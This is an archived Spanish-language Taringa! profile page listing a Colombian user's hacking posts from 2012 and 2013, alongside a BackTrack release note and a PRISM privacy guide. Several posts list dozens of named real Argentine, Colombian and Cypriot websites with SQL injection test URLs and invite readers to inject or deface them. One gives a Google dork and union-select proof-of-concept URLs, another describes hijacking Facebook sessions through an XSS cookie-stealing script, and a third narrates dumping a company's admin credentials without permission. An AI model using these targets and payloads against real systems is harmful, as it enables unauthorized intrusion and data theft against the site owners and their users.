D

DiegoAsencio

Usuario (Colombia)

Primer post: 29 nov 2011
36
Posts
1957
Puntos totales
31
Comentarios
D
De 0 a Ninja - DrangonJar.org
InfoporAnónimo3/16/2014

Sin descripción

15
0
Lanzamiento Oficial de BackTrack 5 R3
Lanzamiento Oficial de BackTrack 5 R3
InfoporAnónimo8/15/2012

BackTrack 5 R3 ha sido puesto en libertad, la version R3 se centra en la correcciones de errores, así como la adición de más de 60 nuevas herramientas - varios de los cuales fueron puestos en libertad en el BlackHat y la Defcon 2012. Toda una categoría nueva herramienta - Physical Exploitation, que ahora incluye herramientas tales como el IDE de Arduino y bibliotecas, así como la recolección de Kautilya Teensy payload collection. Construir, probar y lanzar una nueva revisión de BackTrack no es nunca una tarea fácil. Mantenerse al día con las últimas herramientas, mientras que equilibrar sus requerimientos de las dependencias, se asemeja a un acto de magia, malabarismo espectáculo. Afortunadamente, los miembros activos de nuestra Comunidad Redmine como backtracklover JudasIscariot y hacer que nuestra tarea sea mucho más fácil activamente reportando errores y sugiriendo nuevas herramientas sobre una base regular. Me quito el sombrero a la dos Nos gustaría dar las gracias a Offensive Security para proporcionar el equipo de BackTrack dev con la financiación y recursos para hacer que todo esto suceda. También, un agradecimiento muy especial a Dookie, como desarrollador principal - para crear, probar y empaquetar la mayor parte de las nuevas herramientas en esta versión. Junto con nuestra habitual de KDE y GNOME, 32/64 bits ISO, hemos publicado una sola imagen de VMware (Gnome, 32 bits) Por último, si usted está buscando el mundo intenso, póngase en el entrenamiento Pruebas de Penetración - asegúrese de dejar caer por el entrenamiento Offensive Security, y aprender el significado de "esforzarse más". Para los impacientes increíblemente, se puede descargar la versión BackTrack 5 R3 vía torrent ahora mismo. Las descargas directas ISO estará disponible una vez que todas nuestras réplicas HTTP se han sincronizado, que debería tener un par de horas. Una vez que esto sucede, vamos a actualizar nuestra página de descarga de BackTrack con todos los enlaces. Descargar BackTrack 5R3:  http://www.backtrack-linux.org/torrents/BT5R3-GNOME-64.torrent">BT5R3-GNOME-64.torrent (md5: 8cd98b693ce542b671edecaed48ab06d) http://www.backtrack-linux.org/torrents/BT5R3-GNOME-32.torrent">BT5R3-GNOME-32.torren (md5: aafff8ff5b71fdb6fccdded49a6541a0) http://www.backtrack-linux.org/torrents/BT5R3-KDE-64.torrent">BT5R3-KDE-64.torrent (md5: 981b897b7fdf34fb1431ba84fe93249f) http://www.backtrack-linux.org/torrents/BT5R3-KDE-32.torrent">BT5R3-KDE-32.torrent (md5: d324687fb891e695089745d461268576) http://www.backtrack-linux.org/torrents/BT5R3-GNOME-32-VM.torrent">BT5R3-GNOME-32-VM.torrent (md5: bca6d3862c661b615a374d7ef61252c5)

11
0
F
FAIL Extenciones .PHP No Filtradas on Uploaders - (Shell Up)
InfoporAnónimo2/3/2013

la falta de filtrar las extenciones de los archivos que se subiran al servidor de parte de un usuario invitado o de un usuario administrador compromete la seguridad del sitio y de los demas dominios alojados en el mismo webserver debido a que un atacante o usuario malintencionado pueda subir una webshell logrando acceso virtual al servidor por completo. he aqui un video demostrativo : link: http://www.youtube.com/watch?v=gSepUXjRIS4 by @r4z0r_bl4ck for @insid30utsid3

0
0
E
Error de SQL en la Pagina Web de la Universidad Javeriana
InfoporAnónimo6/16/2013

BIEN, ESTA TARDE ME ENCONTRE CON UNA SECCION DE LA WEB DE LA UNIVERSIDAD JAVERIANA DE COLOMBIA, ME LLAMO LA ATENCION VER QUE CONTENIA ARCHIVOS .PHP Y DECIDI IR EN BUSCA DE UNA COMBINACION DE PARAMETROS ID. DESPUES DE EXPLORAR LAS SECCIONES DEL PORTAL ME ENCUENTRO CON UNA, ENTONCES HAGO EL TEST DE LA COMILLA SIMPLE, Y BINGO! NOS HA ARROJADO UN ERROR DE SQL... VER AQUI: YA CON ESTE ERROR PODEMOS INTENTAR HACER LA FAMOSA INYECCION SQL E INTENTAR HABER QUE SE PUEDE HACER CON ESE FALLO DE SEGURIDAD QUE PRESENTA LA MEJOR UNIVERSIDAD DE COLOMBIA. BIEN, SI SE DEJA HACER ALGO MAS EL POST CONTINUARA, AUNQUE LA INTENCION DE ESTE CORTO POST ES MOSTRAR SIMPLEMENTE EL ERROR ARROJADO, SIN INTENCION DE DAÑAR LA INTEGRIDAD NI LA SEGURIDAD DE NADIE. SALU2 A TODOS @R4Z0R_BL4CK @insid30utsid3 #ColombianCyberArmy @DiegoAsencio @Diego_Asencio

10
0
Como saltarse técnicamente el espionaje de PRISM
Como saltarse técnicamente el espionaje de PRISM
InfoporAnónimo7/8/2013

Edward Snowden, un ex-empleado de la CIA que formaba parte de un programa de recolección de información creado por la Agencia Nacional de Seguridad de los Estados Unidos llamado PRISM, compartió información sobre el programa con los diarios The Washington Post y The Guardian, donde además de revelar su existencia, también mostraba como el FBI y otras entidades del gobierno estadounidense habrían tenido desde el 2007 acceso directo a los servidores de nueve de las más grandes compañías Estadounidenses de Internet, entre las que están varios gigantes de la industria como Google, Microsoft, Facebook y Apple. Saltar Tecnicamente PRISM Como saltarse técnicamente el espionaje de PRISM Estas revelaciones generaron gran controversia en todo el mundo y confirmaron lo que muchos sospechaban, (incluso hasta los Simpson nos lo advertían), el gobierno Estadounidense utilizando las leyes generadas en su país después del 11 de Septiembre de 2011 a estado espiando digitalmente a usuarios dentro y fuera de su país para “garantizar la seguridad nacional” con el apoyo de numerosas empresas tecnológicas de primer nivel (¿seria este el interes de China en atacar las mismas empresa?). Realizar un resumen de PRISM no es la finalidad este post pero ya que muchos lectores puede que no estén muy enterados del tema, les dejaré una infografía creada por la gente de WWWhatsnew.com, donde comentan el origen, el funcionamiento y la reacción de las empresas después de la divulgación de este programa de espionaje de datos a gran escala: PRISM Como saltarse técnicamente el espionaje de PRISM Aunque existe un grupo formado por más de 80 organizaciones que crearon la iniciativa Stopwatching.us, para recoger firmas y pedirle al congreso Estadounidense que aclare varios puntos relacionados con PRISM, este tipo de iniciativas no son únicas del gobierno Estadounidense el mismo ex-agente de la CIA Edward Snowden comentó que la Inteligencia Británica también mantiene un programa conocido como Tempora(El Maligno ha explicado a fondo los alcances del Tempora), que cuenta con la capacidad para acceder a la red de fibra óptica por la que pasa la mayor parte del tráfico mundial de Internet. Latinoamérica no es ajena al problema, hace poco Ricardo Patiño Aroca el Ministro de Relaciones Exteriores de Ecuador anunció en su cuenta de Twitter que recibido una solicitud de asilo de parte de Edward Snowden y diferentes medios de comunicación anunciaron que el gobierno Colombiano invertirá mas de 50.000 millones de pesos en un sistema tipo PRISM que permitiría espiar Facebook y Skype, sin descartar que otros gobiernos estén trabajando en sistemas parecidos. Entonces… ¿Como saltarse técnicamente el espionaje de PRISM? Para empezar es necesario usar un sistema operativo de empresas que no colaboren con el programa (Apple, Google, y Microsoft lo hacen) y por tanto, que no pueda tener puertas traseras, una buena recomendación seria TAILS una distribución GNU/Linux del tipo live DVD o live USB que intenta mantener tu privacidad y tu anonimato usando la red TOR, borrando cualquier archivo generado (si no le decimos lo contrario) e incluye herramientas de criptografía para cifrar nuestros archivos, mails o conversaciones. TAILS Como saltarse técnicamente el espionaje de PRISM Las búsquedas que hacemos son almacenadas y nos pueden identificar en un momento determinado, ya que las empresas de los principales motores de búsqueda están vinculadas al programa PRISM, deberíamos buscar alternativas que garanticen nuestra privacidad, la alternativa mas conocida que cumple con estas características es DuckDuckGo, un buscador que no almacena nuestros términos de búsqueda y garantiza nuestra privacidad, de hecho desde que se dio a conocer la noticia de PRISM, su trafico ha aumentado en gran medida. DuckDuckGo Como saltarse técnicamente el espionaje de PRISM La mayor parte de nuestro tiempo frente a un equipo de computo la pasamos en un navegador web, por eso necesitamos usar un navegador desarrollado por una empresa que no tenga vínculos con PRISM, por tanto, Google Chrome, Internet Explorer y Safari quedan por fuera, quedando Mozilla Firefox que además de formar parte de la iniciativa Stopwatching.us, tiene la posibilidad de agregar funcionalidades útiles en estos casos con plugins como los siguientes: Firefox Como saltarse técnicamente el espionaje de PRISM HTTPS Everywhere: Detecta cuando un sitio web tiene soporte para HTTPS y si lo tiene nos hace navegar por su versión con SSL, haciendo que todo el trafico que se intercambie con ese servidor web pase cifrado. NO Script y AdBlock: Son 2 plugins que nos permite bloquear el JavaScript y la publicidad de los sitios a los que no les demos autorización, la mayoría de empresas de publicidad o de estadísticas utilizan JavaScript para generan un perfil con nuestros gustos de navegación, bloquearlo aumentaría nuestros niveles de privacidad. Priv3 y Disconnect: Cuando navegamos por sitios con botones de compartir en redes sociales dejamos rastro de nuestra navegación, con estos plugins evitamos dejar estos rastros y aumentar nuestra privacidad. WebGP: Nos permite usar en el navegador la potencia de cifrado de GnuPG/PGP en la web, permitiendo firmar y cifrar documentos, correos, etc… OpenDNS Como saltarse técnicamente el espionaje de PRISM Los DNS serian una fuente de información muy buena para programas como PRISM y seguro que las peticiones al servicio de DNS públicos de Google también estaban dentro de los datos que compartían con la NSA y las demás agencias involucradas en el programa, por tanto es recomendable NO usarlos, y en su remplazo utilizar DNS Públicos e independientes como los OpenDNS, en especial con el aplicativo que añade una capa de cifrado a nuestras consultas DNS (DNSCrypt). 208.67.222.222 208.67.220.220 Peer2Peer Como saltarse técnicamente el espionaje de PRISM Las redes P2P por su naturaleza descentralizada ofrece un espacio perfecto para evitar la censura y aumentar la privacidad en internet, proyectos como Osiris un CMS que se encuentra alojado en estas redes y que no puede ser dado de baja pueden ayudarte a transmitir tu mensaje sin que puedan acallarlo, otro proyecto que hace uso de las redes P2P para permitir distribuir tu contenido sin censura es Dot Bit, o el desarrollado por Informatica64 DUST, un lector de Feeds RSS creado por nuestros amigos españoles de Informatica64, que hace uso de las redes P2P para distribuir tus artículos a tus lectores sin que puedan censurarte. Pero si con estas soluciones no son suficiente, el proyecto ww.prism-break.org ofrece un completo listado de alternativas a programas que podrían estar compartiendo información con PRISM, es una lectura recomendable, no dejes de verla: Alternativas a PRISM Como saltarse técnicamente el espionaje de PRISM Espero que disfrutaran esta nota, cualquier comentario lo pueden dejar abajo icon wink Como saltarse técnicamente el espionaje de PRISM

397
0
D
Dominios .com.ar vulnerables a SQl InjecTion
InfoporAnónimo9/10/2012

BUENO PUES NAVEGANDO POR INTERNET Y COMBINANDO UNA SERIE DE DORKS PARA ENCONTRAR ALGUNOS SITIOS WEB CON VULNERABILIDAD SQL PARA TESTEARLOS ME ENCUENTRO CON ALGUNOS, Y DECIDI POR HACER UNA PEQUEÑA LISTA Y DEJARLA AL PUBLICO PARA QUE AGAN LAS RESPECTIVAS INYECCIONES O TESTEOS DE SEGURIDAD PARA APRENDER, PRACTICAR O SIMPLEMENTE POR DIVERSION http://www.hacerseoir.com.ar/accion1.php?id=164' http://www.serviciosesenciales.com.ar/libro.php?id=241' http://www.faa.com.ar/noticia.php?id=946' http://www.sentirsebien.com.ar/productos.php?id=1' http://www.agroturismomisiones.com.ar/particular.php?id=8} http://www.riehr.com.ar/detalleEdu.php?id=6' http://www.elliberal.com.ar/ampliada.php?ID=33150' http://www.guapachoza.com.ar/detalle_cartelera.php?ID=294' http://www.diegopietrafesa.com.ar/mistextos_detalle.php?id=30' http://www.nissan.com.ar/Modelo_home.php?id=13' http://www.plagasonline.com.ar/productos/detalle.php?id=77' http://www.encuentrosabiertos.com.ar/page_esp.php?id=79' http://www.serviciosesenciales.com.ar/libro.php?id=237' http://www.cabb.com.ar/noticia_ficha.php?id=5988' http://www.argomsrl.com.ar/sitio/producto.php?id=21' http://lacupulagaleria.com.ar/sitio/evento.php?id=21' http://www.elteatroonline.com.ar/puntos.php?id=3' http://www.isiv.com.ar/noticia.php?id=54' http://www.hotelesaustralis.com.ar/novedades.php?id=102' http://www.revistapuerto.com.ar/RP_Noticia_Detalle.php?id=2588 http://www.magsys.com.ar/oportunidad.php?id=404 http://www.escuelaseguraisev.com.ar/interna.php?id=5' TWITTER: @Diego_Asencio TARINGA: @DiegoAsencio

22
8
D
Dominios .com.co vulnerables a SQl InjecTion
InfoporAnónimo9/11/2012

BUENO PS CONTINUANDO CON LA BUSQUEDA DE DOMINIOS VULNERABLES ESTA VES LES DEJO LA LISTA DE UNOS WEBSITES DE COLOMBIA CON LA VULNERABILIDAD SQL PARA QUE AGAN LA INYECCION MANUALMENTE O CON TOOL PARA AUTOMATIZAR LA TAREA Y HACER EL DEFACED O TEST DE SEGURIDAD QUE SE VAYA A HACER SEGUN CADA QUIEN OK... ACA ESTAN http://www.industriasviaggio.com.co/detalle.php?id=2 http://prismatec.com.co/detalle.php?id=70 http://www.asohofrucol.com.co/noticias_detalle.php?id=70 http://www.ccmc.com.co/noticias.php?id=5 http://www.teatronacional.com.co/mic_direccion.php?id=51 http://www.timon.com.co/home.php?id=6 http://www.hotelesmanizales.com.co/detail.php?id=1 http://www.revistadiners.com.co/detalle_mural.php?id=19 http://www.proincol.com.co/sitio.php?Id=7 http://www.bancoomeva.com.co/publicaciones.php?id=9532 http://www.javierlondono.com.co/proyectos_detalle.php?id=1 http://www.emsa-esp.com.co/index.php?id=512 http://www.fundacionpresencia.com.co/index.php?id=4 http://www.fpt.com.co/destacado.php?id=37 http://www.metropolitanclub.com.co/evento.php?id=277 http://www.clubdeportestolima.com.co/noticia.php?id_noticia=96 http://www.ihm.com.co/menu_productos.php?id=1 http://www.cavasa.com.co/eventos1.php?id=1 http://www.museodeltequila.com.co/modulos/inicio/index.php?id=6 http://www.supergiros.com.co/preguntas.php?id=6 http://www.proficol.com.co/producto.php?id=32 http://norcam.com.co/descripcion.php?id=10 http://www.cincel.com.co/noticias_ampliar.php?id=8 http://www.arrecife.com.co/microsite.php?id=13 http://www.bulevar.com.co/index.php?id=13 http://www.flaminlab.com.co/index.php?id=12 http://pavco.com.co/index.php?view=page&id=167 http://www.easy.com.co/detalleServicios.php?id=12 http://www.cidet.com.co/default.php?id=33 http://www.holcim.com.co/index.php?id=3273 http://www.imagine.com.co/masimagine/recomendados.php?id=61 http://www.hospitalencasa.com.co/publicaciones.php?id=24107 http://www.comfenalco.com.co/conozcanos/seccion.php?id=2 http://www.bam.com.co/english/pages/page.php?id=6 http://www.piensaenmi.com.co/galeria.php?id=1 http://www.recordar.com.co/index.php?id=222 http://www.realai.com.co/servicios.php?id=4 http://colombochina.com.co/html/articulo.php?id=45 PUEDEN SEGUIRME EN LAS REDES SOCIALES FACEBOOK: https://www.facebook.com/3SC0RP10NBL4CK TWITTER: http://twitter.com/Diego_Asencio TARINGA: www.taringa.net/DiegoAsencio @Diego_Asencio @DiegoAsencio CUALQUIER DUDA NO DUDEN EN CONSULTARME EN UN MP POR ACA O POR ALGUNA DE LAS REDES SOCIALES ..... SALUDOS A TODOS

10
0
X
Xss & Hijacking Facebook
InfoporAnónimo9/14/2012

PUES BIEN...¡¡ Encontrar un XSS en Facebook no es nada del otro mundo tan solo usando algo de intuición y usando Scripts nuevos las posibilidades se acercan a un mucho en encontrar una vulnerabilidad en el sistema no olvidemos que hace un mes aproximadamente encontré un REMOTE POST SQL INJECTION VULNERABILITY en Facebook puedes acceder AQUÍ. Bueno empecemos lo primero dirigirce a la opción que FACEBOOK brinda la que es de crear un grupo una vez realizado nos pedira que agregemos un nombre al nuevo grupo que ya hemos creado en el nombre agregaremos el Script que esta en la imagen. Una vez realizado este paso tan sencillo agregamos a un contacto de nuestra lista una vez realizado esto nos dirigimos a la pagina de inicio y se mostrara la notificacion que hemos agregado a ( X contacto ) y junto a ella el mensaje de alerta XSS y listo hemos encontrado una vulnerabilidad en Facebook parecido a lo siguiente. Bueno y esto a un no acaba para seguir con el proceso de explotacion de esta vulnerabilidad usaremos la técnica conocida como HIJACKING en este proceso lo que se realiza es el secuestro de cuentas en este caso cuentas de la Red Social en la que estamos realizando el test de seguridad. Como hemos visto encontramos una vulnerabilidad XSS en la sección de grupos de Facebook ahora nos dirigimos a la opción del grupo para cambiar el nombre y lo modificamos por algún SCRIPT mas completo para realizar el HIJACKING entre el el codigo ( "XSS" sustituiremos por el codigo del metodo ya mencionado. Una vez realizado esto y acorde al codigo que se uso las cookies se enviaran al CORREO o via FTP algun archivo de texto en un servidor. # NOTA: ESTE SECUESTRO CUENTAS DE LA RED SOCIAL FACEBOOK SOLO FUNCIONA CON LOS MIEMBROS QUE SEAN AGREGADOS AL GRUPO QUE TIENE EL CODIGO MALICIOSO EL FALLO FUE REPORTADO AL GRUPO DE SEGURIDAD DE FACEBOOK..¡¡¡ FACEBOOK: https://www.facebook.com/3SC0RP10NBL4CK TWITTER: http://twitter.com/Diego_Asencio TARINGA: www.taringa.net/DiegoAsencio @Diego_Asencio @DiegoAsencio CUALQUIER DUDA NO DUDEN EN CONSULTARME EN UN MP POR ACA O POR ALGUNA DE LAS REDES SOCIALES ..... SALUDOS A TODOS GRACIAS Y SALU2 A @TaurusOmar_ VISITA EL SITIO WEB DEL AUTOR, Y EL POST ORIGINAL.

13
0
[
[0day] debliteckservices / SQL Injection vulnerability
InfoporAnónimo2/3/2013

# Exploit Title: debliteckservices / SQL Injection vulnerability # Date: 02/02/2013 # Exploit Author: Diego_Asencio || r4z0r_bl4ck # Twitter: @r4z0r_bl4ck # Blog: http://r4z0rbl4ck.wordpress.com/ # Vendor Homepage: http://www.debliteckservices.com/ # Tested on: Windows Ultimate - Linux Ubuntu # Categoria: WebApps - PHP # Google Dork: inurl:gallery.php?id= intextebliteck # WorkGroup: @inside0utside -= INFORMACION =- La empresa debliteckservices dedicada al diseño y desarrollo web, dentro de su portafolio de trabajo contiene paginas web en lenguaje PHP con vulnerabilidad de SQL, la cual permite al atacante inyectar peticiones o consultas a la base de datos. -= MYSQL ERROR's =- 1) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and state='ACTIVE' order by sort limit 0,12' at line 1 2) Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/h/o/domain/public_html/include/function.php on line 97 3) Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/x/y/domain/public_html/header.php on line 82 4) Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/n/o/domain/web/public_html/header.php on line 13 -= XPL (PoC) =- http://127.0.0.1/gallery.php?id=1+union+all+select+0,1,2,3,4-- http://127.0.0.1/section.php?id=1+union+all+select+0,1,2,3,4-- http://127.0.0.1/article.php?id=1+union+all+select+0,1,2,3,4-- -= DEMO's =- http://www.st-raphaelhospital.com/gallery.php?id=6' (SQLi) http://www.coralsearesorts.eu/gallery.php?id=15' (SQLi) http://www.nplanitis.com/gallery.php?id=8' (SQLi) http://www.camel-park.com/gallery.php?id=2' (SQLi) http://www.underseawalkers.com/gallery.php?id=1' (SQLi) http://www.bellsinn.com/gallery.php?id=2' (SQLi) http://www.olympicresidence.com/gallery.php?id=13' (SQLi) http://www.kanika-ibc.com/gallery.php?id=2' (SQLi) http://www.limocy.com/gallery.php?id=4' (SQLi) http://www.demetriseliaproperties.com/gallery.php?id=3' (SQLi) http://www.forcecars.com/gallery.php?id=1' (SQLi) http://www.newfamagustahotel.com/gallery.php?id=6' (SQLi) http://d-kombosdevelopers.com/gallery.php?id=7' (SQLi) http://xylophagou.com/gallery.php?id=3' (SQLi) http://www.easyriders.com.cy/gallery.php?id=3' (SQLi) http://www.agf.com.cy/gallery.php?id=1' (SQLi) http://www.nissi-beach.com/section.php?id=20' (SQLi) http://www.hotelsayianapa.com/section.php?id=7' (SQLi) http://www.nozomi.com.cy/article.php?id=45' (SQLi) ################################# Agradecimientos a: @Sr_Xaoc @inside0utside - t34m / - all members @r4z0r_bl4ck @sr_xaoc @MaximusWell @MikeSoft -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

0
0
D
Descubriendo Vulnerabilidad Con Nessus Scan <3 by R4z0r_
InfoporAnónimo7/6/2013

Bueno Amigos, en este post les mostrare lo PODEROSO que es NESSUS. ayer estaba navegando por internet y me encuentro con una pagina web que ofrece soluciones informaticas, al parecer es de ingenieros de la universidad donde me estoy formando, por ende me doy cuenta que es de la misma ciudad donde vivo .. me dio curiosidad ver la web y hacer unos testeos basicos explorando las secciones de la pagina web buscando combinaciones de parametros que me dieran paso a una vulnerabilidad de SQL. Solamente encontre la siguiente combinacion: https://www.target.com/publicaciones/index.php?id_publicacion=3 al hacerle el test simple de la comilla, esta nos devuelve el siguiente mensaje: En este momento no se puede acceder a la informacion, por favor intentelo mas tarde. No es ningun error de MySQL pero aun asi pase la URL por SQLMAP para intentar hacer la inyeccion. Como era de esperarse la web en esa seccion NO era vulnerable. pues bien, me di cuenta que la pagina web SI estaba diseñada en lenguaje PHP y manejaba SQL, y que al parecer tenian indexado las secciones de la pagina para no mostrar dichas combinaciones (al parecer las vulnerables) entonces recuerdo que tengo junto a mi, un poderoso Scanner de Vulnerabilidades con el cual queria retificarme de que enrealidad existiera dicha Vulnerabilidad de SQL Injection. Pues Bien! despues de esperar que el analisis terminara, los resultados fueron los siguientes: LOS RESULTADOS SON POSITIVOS PARA EL AUDITOR DE SEGURIDAD QUE REALIZE EL PENTEST, PERO NEGATIVOS PARA LOS CEO'S DE LA EMPRESA quize mirar mas acerca de ese informe de la vulnerabilidad critica de SQL INjection que aparece en el reporte: como vimos, aparte de que nessus nos indico acerca de el o las vulnerabilidades nos muestra la ruta de donde el sistema posee dicha vulnerabilidad, en este caso la que nos interesa la Injeccion SQL. procedo a retificar de que si exista dicha vulnerabilidad, me dirigo al link: https://www.target.com/2010/cliente_detallado.php?id_cliente='+convert(int,convert(varchar,0x7 b5d))+' efectivamente arrojo el error de MySQL . ahora ya teniendo la URL vulnerable, solo me quedaba explotarla, entonces ahi si la pase por SQLMAP. Sacando Nombres de Bases de Datos: ahora las tablas de dicha base de datos: ahora las columnas y por ultimo... los datos !! ENHORABUENA!!! HEMOS CONSEGUIDO LOS DATOS DEL ADMINISTRADOR. TODO LO QUE PODEMOS LLEGAR A HACER GRACIAS A ESTE HERMOSO SOFTWARE DE ANALISIS DE VULNERABILIDADES, QUE NO SOLO SIRVE PARA APLICACIONES WEB , SINO QUE FUNCIONA EN ANALISIS DE REDES INTERNAS O EXTERNAS. BIEN, POR ULTIMO LES RECOMIENDO SI VAN A REALIZAR UN TEST DE INTRUSION, TENER ESTA PODEROSA ARMA DE INFORMATION GATHERING, PUESTO QUE NOS ARROJA UNA SERIE DE DESCUBRIMIENTOS QUE PUEDEN SER USADOS EN CONTRA DEL SISTEMA AUDITADO. YA AVISE A LOS ADMINISTRADORES ACERCA DE DICHOS FALLOS, Q NO SOLO ES ESTE DE SQL, SINO OTRO COMO UN BLIND SQL, XSS, AUTENTICACION DE FORMULARIOS EN TEXTO PLANO .. ETC... AUNQUE EL PENTEST NO QUEDO EN ESTA SIMPLE EXPLOTACION DE USERS Y PASS DEL ADMIN POR MEDIO DE LA SQL INJECTION, SOLO LES QUERIA MOSTRAR LO PODEROSO QUE ES NESSUS. GRACIAS TENABLE! HASTA PRONTO, SALU2 A TOD@S (y) by R4z0r_ @Diego_Asencio on twitter @DiegoAsencio on Taringa!

30
0
PosteameloArchivo Histórico de Taringa! (2004-2017). Preservando la inteligencia colectiva de la internet hispanohablante.

CONTACTO

18 de Septiembre 455, Casilla 52

Chillán, Región de Ñuble, Chile

Solo correo postal

© 2026 Posteamelo.com. No afiliado con Taringa! ni sus sucesores.

Contenido preservado con fines históricos y culturales.